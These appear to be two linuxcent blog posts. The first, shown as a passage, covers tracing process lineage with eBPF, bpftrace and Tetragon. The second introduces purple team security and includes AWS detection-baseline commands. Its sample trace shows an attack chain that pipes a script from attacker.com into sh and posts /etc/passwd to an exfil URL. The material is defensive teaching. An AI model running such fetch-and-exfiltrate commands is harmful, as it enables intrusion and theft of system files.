1. Validates the binary (verifier/capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This fork → exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.

Building the Process Tree with kprobes

The two core hooks for process lineage:

# Every fork — capture parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (retval > 0) {
        # retval is the child PID (from parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, retval, comm);
    }
}'

# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n",
           pid,
           curtask->real_parent->tgid,
           str(args->filename),
           str(*args->argv));
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.

How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

To inspect Tetragon’s process cache directly:

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.

Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["1"]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.

Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.

⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace‘s comm built-in has the same limit. For the full binary path, read from execve‘s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.

Quick Reference

What you want	Command
Live exec trace (bpftrace)	`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'`
Fork + exec tree	Combine `sys_exit_clone` + `sys_enter_execve` traces, correlate by pid/ppid
Tetragon process events	`tetra getevents --event-types PROCESS_EXEC`
Tetragon file + network	`tetra getevents --event-types PROCESS_KPROBE`
Process cache map	`bpftool map list \| grep process_cache` → `bpftool map dump id N`
Map PID to pod	`cat /proc/<pid>/cgroup` → extract pod UID
Process exit events	`tracepoint:sched:sched_process_exit`

Process event	Kernel hook
New process spawned	`tracepoint:syscalls:sys_exit_clone` (retval > 0 = child PID)
Binary executed	`tracepoint:syscalls:sys_enter_execve`
Process exited	`tracepoint:sched:sched_process_exit`
File opened	`tracepoint:syscalls:sys_enter_openat`
Network connect	`kprobe:tcp_connect`
DNS query	`tracepoint:syscalls:sys_enter_sendto` (port 53)

Key Takeaways

Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe

What Is Purple Team Security: Red + Blue = Better Defense

May 11, 2026 by Vamshi Krishna Santhapuri

Reading Time: 8 minutes

What Is Purple Team Security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025

TL;DR

Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
Traditional red team engagements produce a report; purple team produces a faster MTTD (mean time to detect)
The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.

The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                      │
│              │ What didn't│                                      │
│              │ Why?       │                                      │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.

Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.

What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK framework lists over 400 techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.

What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.

The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
– Updated detection rules (tested and verified)
– A measured detection time for each technique
– A documented attack scenario with the specific commands used
– A baseline for the next exercise to beat

This is what “purple” means: the red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.

The MITRE ATT&CK Scaffolding

Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.

Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Injection (A03) is the SSRF that hits the EC2 metadata endpoint.

The framing shifts. The categories don’t.

Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.

Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

aws guardduty list-findings \
  --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 50 aws guardduty get-findings \
    --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, severity: .Severity, count: 1}' | \
  jq -s 'group_by(.type) | map({type: .[0].type, count: length})'

# Check if CloudTrail is enabled and logging management events
aws cloudtrail describe-trails --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail,LoggingEnabled:HasCustomEventSelectors}' --output table

# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.

⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.

No documentation of the exercise environment state. If you tune a detection rule during an exercise and then a Terraform change overwrites the policy, you’ve lost the improvement. All detection changes from exercises go through version control immediately.

Quick Reference

Term	Definition
Purple team security	Practice of combined red/blue exercises where both teams improve detection together
MTTD	Mean Time to Detect — the primary metric purple team exercises reduce
ATT&CK	MITRE framework mapping adversary techniques to data sources and detections
Red phase	Attacker perspective: simulate the technique with real commands
Blue phase	Defender perspective: what detection fires (or doesn’t)
Purple phase	The joint debrief and immediate detection tuning that makes both better
Detection baseline	Measured MTTD and technique coverage before the first exercise
OWASP Top 10	Threat taxonomy used in this series — applies to infrastructure, not just web apps

Key Takeaways

Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
The metric that matters is detection time per technique — not findings count
Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
Every major cloud breach 2020–2025 maps to an OWASP category — those categories are the exercise backlog for any cloud-running organization
Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
Frequency of exercises is the primary driver of improvement — monthly beats annual by an order of magnitude

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.

Get EP02 in your inbox when it publishes → subscribe at linuxcent.com